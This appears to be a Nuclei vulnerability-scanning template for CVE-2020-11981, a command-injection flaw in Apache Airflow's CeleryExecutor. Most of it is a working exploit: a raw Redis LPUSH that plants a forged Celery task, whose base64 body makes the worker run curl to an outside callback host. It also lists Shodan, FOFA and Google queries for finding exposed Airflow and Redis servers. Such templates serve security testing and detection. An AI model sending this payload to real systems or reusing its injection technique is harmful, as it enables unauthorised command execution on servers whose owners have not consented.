An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.
PoC代码[已公开]
id: CVE-2020-11981
info:
name: Apache Airflow <=1.10.10 - Command Injection
author: pussycat0x
severity: critical
description: |
An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.
impact: |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
remediation: Upgrade apache-airflow to version 1.10.11 or higher.
reference:
- https://github.com/apache/airflow/pull/9178
- https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981
- https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E
- https://github.com/t0m4too/t0m4to
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-11981
cwe-id: CWE-78
epss-score: 0.90512
epss-percentile: 0.99589
cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: apache
product: airflow
shodan-query:
- product:"redis"
- http.title:"airflow - dags" || http.html:"apache airflow"
- http.title:"sign in - airflow"
fofa-query:
- apache airflow
- title="airflow - dags" || http.html:"apache airflow"
- title="sign in - airflow"
google-query:
- intitle:"airflow - dags" || http.html:"apache airflow"
- intitle:"sign in - airflow"
tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive,tcp
variables:
data: "*3\r
$5\r
LPUSH\r
$7\r
default\r
$936\r
{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \""
encode1: '[[["curl", "http://'
encode2: '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]'
end: '"}'
tcp:
- inputs:
- data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r
')}}"
read: 1024
host:
- "{{Hostname}}"
- "{{Host}}:6379"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: curl"
# digest: 490a0046304402203042ee1bb66d5606440dc824360fe82e3b384031a63c2f391c36dd65352f24b302201467c787556675477b438dd536815de44968c997cd02cafa6965fed49f460e91:922c64590222798bb761d5b6d8e72950